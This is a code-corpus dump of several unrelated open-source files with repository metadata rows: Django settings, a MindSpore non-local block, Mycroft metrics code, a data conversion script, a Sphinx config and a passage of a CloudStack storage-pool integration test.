'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
'OPTIONS':{'min_length':9}
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
# MEDIA
MEDIA_URL = '/media/'
STATIC_URL = '/static/'
LOGIN_URL = '/app/user_login'
| 25.649635
| 91
| 0.701195
|
794fffb730b0175f439472d21994d23d050afe57
| 6,121
|
py
|
Python
|
research/cv/tsm/src/utils/non_local.py
|
mindspore-ai/models
|
9127b128e2961fd698977e918861dadfad00a44c
|
[
"Apache-2.0"
] | 77
|
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/tsm/src/utils/non_local.py
|
mindspore-ai/models
|
9127b128e2961fd698977e918861dadfad00a44c
|
[
"Apache-2.0"
] | 3
|
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/tsm/src/utils/non_local.py
|
mindspore-ai/models
|
9127b128e2961fd698977e918861dadfad00a44c
|
[
"Apache-2.0"
] | 24
|
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""non_local"""
import mindspore.nn as nn
import mindspore.ops as ops
from src.model.resnet import ResNet
class _NonLocalBlockND(nn.Cell):
"""NonLocalBlockND"""
def __init__(self, in_channels, inter_channels=None, dimension=3, sub_sample=True, bn_layer=True):
super(_NonLocalBlockND, self).__init__()
assert dimension in [1, 2, 3]
self.dimension = dimension
self.sub_sample = sub_sample
self.in_channels = in_channels
self.inter_channels = inter_channels
if self.inter_channels is None:
self.inter_channels = in_channels // 2
if self.inter_channels == 0:
self.inter_channels = 1
if dimension == 3:
conv_nd = nn.Conv3d
max_pool_layer = nn.layer.MaxPool2d(kernel_size=(1, 2, 2))
bn = nn.BatchNorm3d
elif dimension == 2:
conv_nd = nn.Conv2d
max_pool_layer = nn.MaxPool2d(kernel_size=(2, 2))
bn = nn.BatchNorm2d
else:
conv_nd = nn.Conv1d
max_pool_layer = nn.MaxPool1d(kernel_size=2)
bn = nn.BatchNorm1d
self.g = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,
kernel_size=1, stride=1, padding=0)
if bn_layer:
self.W = nn.SequentialCell(
[conv_nd(in_channels=self.inter_channels, out_channels=self.in_channels,
kernel_size=1, stride=1, padding=0, weight_init="zeros", bias_init="zeros"),
bn(self.in_channels)]
)
else:
self.W = conv_nd(in_channels=self.inter_channels, out_channels=self.in_channels,
kernel_size=1, stride=1, padding=0, weight_init="zeros", bias_init="zeros")
self.theta = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,
kernel_size=1, stride=1, padding=0)
self.phi = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,
kernel_size=1, stride=1, padding=0)
if sub_sample:
self.g = nn.SequentialCell([self.g, max_pool_layer])
self.phi = nn.SequentialCell([self.phi, max_pool_layer])
def construct(self, x):
"""
:param x: (b, c, t, h, w)
:return:
"""
batch_size = x.size(0)
transpose = ops.Transpose()
g_x = self.g(x).view(batch_size, self.inter_channels, -1)
g_x = transpose(g_x, (0, 2, 1))
theta_x = self.theta(x).view(batch_size, self.inter_channels, -1)
theta_x = transpose(theta_x, (0, 2, 1))
phi_x = self.phi(x).view(batch_size, self.inter_channels, -1)
f = ops.matmul(theta_x, phi_x)
f_div_C = ops.Softmax(f, dim=-1)
y = ops.matmul(f_div_C, g_x)
y = transpose(y, (0, 2, 1))
y = y.view(batch_size, self.inter_channels, *x.size()[2:])
W_y = self.W(y)
z = W_y + x
return z
class NONLocalBlock1D(_NonLocalBlockND):
def __init__(self, in_channels, inter_channels=None, sub_sample=True, bn_layer=True):
super(NONLocalBlock1D, self).__init__(in_channels,
inter_channels=inter_channels,
dimension=1, sub_sample=sub_sample,
bn_layer=bn_layer)
class NONLocalBlock2D(_NonLocalBlockND):
def __init__(self, in_channels, inter_channels=None, sub_sample=True, bn_layer=True):
super(NONLocalBlock2D, self).__init__(in_channels,
inter_channels=inter_channels,
dimension=2, sub_sample=sub_sample,
bn_layer=bn_layer)
class NONLocalBlock3D(_NonLocalBlockND):
def __init__(self, in_channels, inter_channels=None, sub_sample=True, bn_layer=True):
super(NONLocalBlock3D, self).__init__(in_channels,
inter_channels=inter_channels,
dimension=3, sub_sample=sub_sample,
bn_layer=bn_layer)
class NL3DWrapper(nn.Cell):
"""NL3DWrapper"""
def __init__(self, block, n_segment):
super(NL3DWrapper, self).__init__()
self.block = block
self.nl = NONLocalBlock3D(block.bn3.num_features)
self.n_segment = n_segment
def construct(self, x):
x = self.block(x)
nt, c, h, w = x.size()
x = x.view(nt // self.n_segment, self.n_segment, c, h, w).transpose(1, 2) # n, c, t, h, w
x = self.nl(x)
x = x.transpose(1, 2).view(nt, c, h, w)
return x
def make_non_local(net, n_segment):
"""make_non_local"""
if isinstance(net, ResNet):
net.layer2 = nn.SequentialCell(
[NL3DWrapper(net.layer2[0], n_segment),
net.layer2[1],
NL3DWrapper(net.layer2[2], n_segment),
net.layer2[3]]
)
net.layer3 = nn.SequentialCell(
[NL3DWrapper(net.layer3[0], n_segment),
net.layer3[1],
NL3DWrapper(net.layer3[2], n_segment),
net.layer3[3],
NL3DWrapper(net.layer3[4], n_segment),
net.layer3[5]]
)
else:
raise NotImplementedError
| 38.25625
| 104
| 0.576867
|
79500021c2970181de70389666a3ee05a3cf07ca
| 299
|
py
|
Python
|
3. Data types and operators/complex_numbers.py
|
CalilQ/ComDig
|
13c34eaddc909c70a00820e3a15e1308139cb134
|
[
"MIT"
] | null | null | null |
3. Data types and operators/complex_numbers.py
|
CalilQ/ComDig
|
13c34eaddc909c70a00820e3a15e1308139cb134
|
[
"MIT"
] | null | null | null |
3. Data types and operators/complex_numbers.py
|
CalilQ/ComDig
|
13c34eaddc909c70a00820e3a15e1308139cb134
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 19 16:45:07 2017
@author: Calil
"""
# Funcoes para numeros complexos
from cmath import sqrt
# Declarar variaveis
a = 4
b = -4
c = 1 + 2j
d = 3 - 3j
# Imprimir na tela
print(sqrt(a))
print(sqrt(b))
print(c + d)
print(a*c)
print(d.real)
print(d.imag)
| 13
| 35
| 0.638796
|
795000af495cf9094a09aa0c7df2156df11f8319
| 6,088
|
py
|
Python
|
mycroft/metrics/__init__.py
|
assistent-cat/mycroft-core
|
6f8bae6ba136c9dd66ca47aaadd75e214d006190
|
[
"Apache-2.0"
] | 2
|
2021-04-05T22:28:37.000Z
|
2021-06-16T00:24:41.000Z
|
mycroft/metrics/__init__.py
|
assistent-cat/mycroft-core
|
6f8bae6ba136c9dd66ca47aaadd75e214d006190
|
[
"Apache-2.0"
] | 4
|
2021-06-08T22:01:56.000Z
|
2022-03-12T00:41:15.000Z
|
mycroft/metrics/__init__.py
|
assistent-cat/mycroft-core
|
6f8bae6ba136c9dd66ca47aaadd75e214d006190
|
[
"Apache-2.0"
] | 2
|
2020-09-28T01:38:34.000Z
|
2020-12-03T03:14:32.000Z
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from queue import Queue, Empty
import threading
import time
import requests
from mycroft.api import DeviceApi, is_paired
from mycroft.configuration import Configuration
from mycroft.session import SessionManager
from mycroft.util.log import LOG
from mycroft.version import CORE_VERSION_STR
from copy import copy
class _MetricSender(threading.Thread):
"""Thread responsible for sending metrics data."""
def __init__(self):
super().__init__()
self.queue = Queue()
self.daemon = True
self.start()
def run(self):
while True:
time.sleep(30)
try:
while True: # Try read the queue until it fails
report_metric(*self.queue.get_nowait())
time.sleep(0.5)
except Empty:
pass # If the queue is empty just continue the loop
except Exception as e:
LOG.error('Could not send Metrics: {}'.format(repr(e)))
_metric_uploader = _MetricSender()
def report_metric(name, data):
"""
Report a general metric to the Mycroft servers
Args:
name (str): Name of metric. Must use only letters and hyphens
data (dict): JSON dictionary to report. Must be valid JSON
"""
try:
if is_paired() and Configuration().get()['opt_in']:
DeviceApi().report_metric(name, data)
except requests.RequestException as e:
LOG.error('Metric couldn\'t be uploaded, due to a network error ({})'
.format(e))
def report_timing(ident, system, timing, additional_data=None):
"""Create standardized message for reporting timing.
Arguments:
ident (str): identifier of user interaction
system (str): system the that's generated the report
timing (stopwatch): Stopwatch object with recorded timing
additional_data (dict): dictionary with related data
"""
additional_data = additional_data or {}
report = copy(additional_data)
report['id'] = ident
report['system'] = system
report['start_time'] = timing.timestamp
report['time'] = timing.time
_metric_uploader.queue.put(('timing', report))
class Stopwatch:
"""
Simple time measuring class.
"""
def __init__(self):
self.timestamp = None
self.time = None
def start(self):
"""
Start a time measurement
"""
self.timestamp = time.time()
def lap(self):
cur_time = time.time()
start_time = self.timestamp
self.timestamp = cur_time
return cur_time - start_time
def stop(self):
"""
Stop a running time measurement. returns the measured time
"""
cur_time = time.time()
start_time = self.timestamp
self.time = cur_time - start_time
return self.time
def __enter__(self):
"""
Start stopwatch when entering with-block.
"""
self.start()
def __exit__(self, tpe, value, tb):
"""
Stop stopwatch when exiting with-block.
"""
self.stop()
def __str__(self):
cur_time = time.time()
if self.timestamp:
return str(self.time or cur_time - self.timestamp)
else:
return 'Not started'
class MetricsAggregator:
"""
MetricsAggregator is not threadsafe, and multiple clients writing the
same metric "concurrently" may result in data loss.
"""
def __init__(self):
self._counters = {}
self._timers = {}
self._levels = {}
self._attributes = {}
self.attr("version", CORE_VERSION_STR)
def increment(self, name, value=1):
cur = self._counters.get(name, 0)
self._counters[name] = cur + value
def timer(self, name, value):
cur = self._timers.get(name)
if not cur:
self._timers[name] = []
cur = self._timers[name] = []
cur.append(value)
def level(self, name, value):
self._levels[name] = value
def clear(self):
self._counters = {}
self._timers = {}
self._levels = {}
self._attributes = {}
self.attr("version", CORE_VERSION_STR)
def attr(self, name, value):
self._attributes[name] = value
def flush(self):
publisher = MetricsPublisher()
payload = {
'counters': self._counters,
'timers': self._timers,
'levels': self._levels,
'attributes': self._attributes
}
self.clear()
count = (len(payload['counters']) + len(payload['timers']) +
len(payload['levels']))
if count > 0:
# LOG.debug(json.dumps(payload))
def publish():
publisher.publish(payload)
threading.Thread(target=publish).start()
class MetricsPublisher:
def __init__(self, url=None, enabled=False):
conf = Configuration().get()['server']
self.url = url or conf['url']
self.enabled = enabled or conf['metrics']
def publish(self, events):
if 'session_id' not in events:
session_id = SessionManager.get().session_id
events['session_id'] = session_id
if self.enabled:
requests.post(
self.url,
headers={'Content-Type': 'application/json'},
data=json.dumps(events), verify=False)
| 28.853081
| 77
| 0.600197
|
795002b748adfab2457ef4a06efc49bada9cbf79
| 3,294
|
py
|
Python
|
data/consumer_expenditures/raw/convert_CE_data.py
|
srnnkls/getml-examples
|
45d179928ce6d7dccb2848b37c709b1dae0081e0
|
[
"MIT"
] | null | null | null |
data/consumer_expenditures/raw/convert_CE_data.py
|
srnnkls/getml-examples
|
45d179928ce6d7dccb2848b37c709b1dae0081e0
|
[
"MIT"
] | null | null | null |
data/consumer_expenditures/raw/convert_CE_data.py
|
srnnkls/getml-examples
|
45d179928ce6d7dccb2848b37c709b1dae0081e0
|
[
"MIT"
] | null | null | null |
## This script imports the CE data and formats it in such a way the
## user can handle it way more easily in the getting started guide.
import datetime
import os
import numpy as np
import pandas as pd
## -------------------------------------------------------------------
## Setup
# The folder that contains all required .csv files.
RAW_DATA_FOLDER = "./"
## -------------------------------------------------------------------
## Read the data from the source files
expd = pd.read_csv(os.path.join(RAW_DATA_FOLDER, "expd151.csv"))
expd = expd.append(pd.read_csv(os.path.join(RAW_DATA_FOLDER, "expd152.csv")))
expd = expd.append(pd.read_csv(os.path.join(RAW_DATA_FOLDER, "expd153.csv")))
expd = expd.append(pd.read_csv(os.path.join(RAW_DATA_FOLDER, "expd154.csv")))
# -----------------------------------------------------------------------------
# Set up target - we want to predict whether the item is a gift
expd["TARGET"] = [0.0 if elem == 2 else 1.0 for elem in expd["GIFT"]]
# -----------------------------------------------------------------------------
# Remove the instances where date is nan - they will be ignored by the Multirel
# engine anyway, because of the NULL value handling policy.
expd = expd[
(expd["EXPNYR"] == expd["EXPNYR"]) & (expd["EXPNMO"] == expd["EXPNMO"])
]
# -----------------------------------------------------------------------------
# Set up date - TIME_STAMP_SHIFTED exists to make sure only data up to the
# PREVIOUS month is used.
expd["TIME_STAMP"] = [
datetime.datetime(int(year), int(month), 1) for year, month in zip(expd["EXPNYR"], expd["EXPNMO"])
]
expd["TIME_STAMP_SHIFTED"] = [
datetime.datetime(int(year), int(month), 15) for year, month in zip(expd["EXPNYR"], expd["EXPNMO"])
]
# -----------------------------------------------------------------------------
# Set up "BASKETID"
expd["BASKETID"] = [
str(x) + "_" + y.strftime("%Y-%m") for x, y in zip(expd["NEWID"], expd["TIME_STAMP"])
]
# -----------------------------------------------------------------------------
# Build a training, validation and testing flag. We will use January to August
# for training, September and October for validation and November and December
# for testing. If you decide to add more data, you should probably come up
# with your own way of separating the data.
expd["Stage"] = [
"Testing" if month > 10.0 else
"Validation" if month > 8.0 else
"Training" for month in expd["EXPNMO"]
]
# -----------------------------------------------------------------------------
# Set up UCCs - the UCCs are a way to systematically categorize products.
# Every digit has significance. That is why we create extra columns for
# that contain the first digit, the first two digits etc.
ucc = np.asarray(expd["UCC"]).astype(str)
expd["UCC1"] = [elem[:1] for elem in ucc]
expd["UCC2"] = [elem[:2] for elem in ucc]
expd["UCC3"] = [elem[:3] for elem in ucc]
expd["UCC4"] = [elem[:4] for elem in ucc]
expd["UCC5"] = [elem[:5] for elem in ucc]
## -------------------------------------------------------------------
## Export data into new .csv files.
expd[expd["Stage"] == "Training"].to_csv("../CE_population_training.csv")
expd[expd["Stage"] == "Validation"].to_csv("../CE_population_validation.csv")
expd.to_csv("../CE_peripheral.csv")
| 37.862069
| 103
| 0.549787
|
795003e5f15f8f992f531ccda78dc10090e9e051
| 8,415
|
py
|
Python
|
docs/conf.py
|
novafloss/django-i18nurl
|
0c7d5505154dd8f3c1c78e64d6c3dbc33a63fa8b
|
[
"BSD-3-Clause"
] | null | null | null |
docs/conf.py
|
novafloss/django-i18nurl
|
0c7d5505154dd8f3c1c78e64d6c3dbc33a63fa8b
|
[
"BSD-3-Clause"
] | null | null | null |
docs/conf.py
|
novafloss/django-i18nurl
|
0c7d5505154dd8f3c1c78e64d6c3dbc33a63fa8b
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# django-i18nurl documentation build configuration file, created by
# sphinx-quickstart on Mon Aug 27 11:37:23 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# Minimal Django settings. Required to use sphinx.ext.autodoc, because
# django-i18nurl depends on Django...
from django.conf import settings
settings.configure(
DATABASES={}, # Required to load ``django.views.generic``.
)
doc_dir = os.path.dirname(os.path.abspath(__file__))
project_dir = os.path.dirname(doc_dir)
version_filename = os.path.join(project_dir, 'VERSION')
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.autosummary',
'sphinx.ext.doctest', 'sphinx.ext.coverage']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.txt'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'django-i18nurl'
copyright = u'2013, Novapost'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = open(version_filename).read().strip()
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
language = 'en'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
html_sidebars = {
'**': ['globaltoc.html',
'relations.html',
'sourcelink.html',
'searchbox.html'],
}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'django-i18nurldoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'django-i18nurl.tex', u'django-i18nurl Documentation',
u'Novapost', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'django-i18nurl', u'django-i18nurl Documentation',
[u'Novapost'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'django-i18nurl', u'django-i18nurl Documentation',
u'Novapost', 'django-i18nurl', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| 31.754717
| 80
| 0.712894
|
795003eec7257fcd8190b74ce5ba4d88f2aab131
| 70,897
|
py
|
Python
|
test/integration/component/maint/testpath_disablestoragepool.py
|
ycyun/ablestack-cloud
|
b7bd36a043e2697d05303246373988aa033c9229
|
[
"Apache-2.0"
] | 1,131
|
2015-01-08T18:59:06.000Z
|
2022-03-29T11:31:10.000Z
|
test/integration/component/maint/testpath_disablestoragepool.py
|
ycyun/ablestack-cloud
|
b7bd36a043e2697d05303246373988aa033c9229
|
[
"Apache-2.0"
] | 5,908
|
2015-01-13T15:28:37.000Z
|
2022-03-31T20:31:07.000Z
|
test/integration/component/maint/testpath_disablestoragepool.py
|
ycyun/ablestack-cloud
|
b7bd36a043e2697d05303246373988aa033c9229
|
[
"Apache-2.0"
] | 1,083
|
2015-01-05T01:16:52.000Z
|
2022-03-31T12:14:10.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Utilities functions
"""
# All tests inherit from cloudstack TestCase
from marvin.cloudstackTestCase import cloudstackTestCase
from marvin.cloudstackTestCase import cloudstackTestCase
import unittest
from marvin.codes import FAILED, PASS
from marvin.lib.base import (Account,
VirtualMachine,
ServiceOffering,
User,
DiskOffering,
Volume,
Template,
VmSnapshot,
StoragePool,
Host,
Capacities)
from marvin.lib.utils import cleanup_resources, validateList
from marvin.lib.common import (get_zone,
get_domain,
list_clusters,
get_template,
list_volumes,
list_virtual_machines)
from nose.plugins.attrib import attr
from ddt import ddt, data
def verify_vm_state(self, vmid, state):
list_vm = list_virtual_machines(self.userapiclient,
account=self.account.name,
domainid=self.account.domainid,
id=vmid)
self.assertEqual(
validateList(list_vm)[0],
PASS,
'Check List vm response for vmid: %s' %
vmid)
self.assertGreater(
len(list_vm),
0,
'Check the list vm response for vm id: %s' %
vmid)
vm = list_vm[0]
self.assertEqual(
vm.id,
str(vmid),
'Vm deployed is different from the test')
self.assertEqual(vm.state, state, 'VM is not in %s state' % state)
self.debug('VM is in is %s state' % state)
def verify_pool_state(self, poolid, state):
list_storage_pool_response = StoragePool.list(
self.userapiclient, id=poolid)
self.assertGreater(len(list_storage_pool_response), 0,
'Check list pool response is greater than 0')
self.assertEqual(
list_storage_pool_response[0].state,
state,
'Storage pool is not in %s state' %
state)
def verify_vm_storage_pool(self, vmid, storageid):
root_volume = Volume.list(
self.userapiclient,
virtualmachineid=vmid,
type='ROOT')[0]
list_volume = Volume.list(self.userapiclient, id=root_volume.id)
self.assertEqual(
list_volume[0].storageid,
storageid,
'check list volume response for Storage id: % s ' %
storageid)
@ddt
class TestPathDisableStorage_Basic(cloudstackTestCase):
"""
# Tests in this path requires to be run independently
# ( not to be run in parallel with any other tests since it involves disabling/enabling storage pools \
and may cause unexpected failures in other tests
# The test also requires to have 2 Cluster-wide and 2 zone-wide storage pools available in the setup.
# For running the tests on local storage, ensure there are 2 local storage pools set up on each host
"""
@classmethod
def setUpClass(cls):
testClient = super(
TestPathDisableStorage_Basic,
cls).getClsTestClient()
cls.apiclient = testClient.getApiClient()
cls.testdata = testClient.getParsedTestDataConfig()
cls.domain = get_domain(cls.apiclient)
cls.zone = get_zone(cls.apiclient)
cls.testdata['mode'] = cls.zone.networktype
cls.template = get_template(
cls.apiclient,
cls.zone.id,
cls.testdata['ostype'])
cls.testdata['template']['ostypeid'] = cls.template.ostypeid
if cls.template == FAILED:
cls.fail(
'get_template() failed to return template with description %s'
% cls.testdata['ostype'])
cls._cleanup = []
cls.disabled_list = []
cls.testdata['template_2']['zoneid'] = cls.zone.id
cls.testdata['template_2']['ostypeid'] = cls.template.ostypeid
cls.hypervisor = testClient.getHypervisorInfo()
try:
cls.debug('Creating account')
cls.account = Account.create(cls.apiclient,
cls.testdata['account'],
admin=True
)
cls._cleanup.append(cls.account)
except Exception as e:
cls.tearDownClass()
raise e
# Create shared storage offerings
cls.service_offering_shared = ServiceOffering.create(
cls.apiclient, cls.testdata['service_offering'])
cls._cleanup.append(cls.service_offering_shared)
cls.disk_offering_shared = DiskOffering.create(
cls.apiclient, cls.testdata['disk_offering'])
cls.resized_disk_offering = DiskOffering.create(
cls.apiclient, cls.testdata['resized_disk_offering'])
cls._cleanup.append(cls.disk_offering_shared)
# Create offerings for local storage if local storage is enabled
if cls.zone.localstorageenabled:
cls.testdata["service_offerings"]["tiny"]["storagetype"] = 'local'
cls.service_offering_local = ServiceOffering.create(
cls.apiclient, cls.testdata["service_offerings"]["tiny"])
cls._cleanup.append(cls.service_offering_local)
cls.testdata["disk_offering"]["storagetype"] = 'local'
cls.disk_offering_local = DiskOffering.create(
cls.apiclient, cls.testdata["disk_offering"])
cls._cleanup.append(cls.disk_offering_local)
cls.testdata["disk_offering"]["storagetype"] = ' '
cls.testdata["service_offerings"]["tiny"]["storagetype"] = ' '
else:
cls.debug("No local storage found")
cls.userapiclient = testClient.getUserApiClient(
UserName=cls.account.name, DomainName=cls.account.domain)
response = User.login(cls.userapiclient,
username=cls.account.name,
password=cls.testdata['account']['password']
)
assert response.sessionkey is not None
@classmethod
def tearDownClass(cls):
try:
cleanup_resources(cls.apiclient, cls._cleanup)
except Exception as e:
raise Exception('Warning:Exception during cleanup: %s' % e)
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.cleanup = []
def tearDown(self):
if self.disabled_list:
for poolid in self.disabled_list:
if StoragePool.list(
self.userapiclient,
id=poolid)[0].state != 'Up':
try:
StoragePool.update(
self.userapiclient, id=poolid, enabled=True)
self.debug('Enabling: % s ' % poolid)
except Exception as e:
self.fail("Couldn't enable storage % s" % id)
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
self.fail('Warning: Exception during cleanup : %s' % e)
@data('host', 'CLUSTER', 'ZONE')
@attr(tags=['advanced', 'advancedsg', 'basic'], required_hardware='false')
def test_01_disable_enable_pool(self, value):
"""
Test Steps:
=========
1. Deploy 2 VMs
2. Stop VM2
3. Disable storage pool SP1
4. Try to deploy a new VM, should fail
5. Start VM2 which was stopped, should run from same pool
6. Remove disabled Storage pool SP1, should fail
7. Enable storage pool SP1
8. Deploy new VM, VM4 - should succeed
9. Create and attach new disk to VM4
10. Disable storage pool SP1 again and enable new pool
11. Deploy new VM, VM5 - should succeed
12. Stop VM1 which is running from disabled pool
13. Migrate ROOT volume of VM1 to another enabled storage pool - should succeed
14. findStoragePoolsforMigration should not list the disabled pool
"""
# Choose appropriate service offering depending on the scope the test
# is being run on
self.disabled_list = []
if value == 'CLUSTER':
other_scope = 'ZONE'
self.service_offering = self.service_offering_shared
self.disk_offering = self.disk_offering_shared
elif value == 'ZONE':
other_scope = 'CLUSTER'
self.service_offering = self.service_offering_shared
self.disk_offering = self.disk_offering_shared
elif value == 'host':
# local storage
other_scope = None
if self.zone.localstorageenabled:
self.service_offering = self.service_offering_local
self.disk_offering = self.disk_offering_local
else:
self.skipTest("Local storage not enabled")
# Keep only one pool active and disable the rest
try:
self.list_storage = StoragePool.list(
self.userapiclient, scope=value)
if self.list_storage:
count_st_pools = len(self.list_storage)
else:
count_st_pools = 0
self.disabled_pool_1 = None
if count_st_pools > 1:
self.debug(
'Found % s storage pools, keeping one and disabling rest' %
count_st_pools)
for pool in self.list_storage[1:]:
self.disabled_pool_1 = self.list_storage[1]
if pool.state == 'Up':
self.debug('Trying to disable storage %s' % pool.id)
try:
StoragePool.update(
self.userapiclient, id=pool.id, enabled=False)
self.disabled_list.append(pool.id)
self.debug(
'Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
raise e
elif count_st_pools == 1:
self.debug(
'Only one % s wide storage found - will not be able to complete all tests' %
value)
else:
self.skipTest('No % s storage pools found' % value)
except Exception as e:
raise e
# Disable the other scope shared storage pools while we are testing on
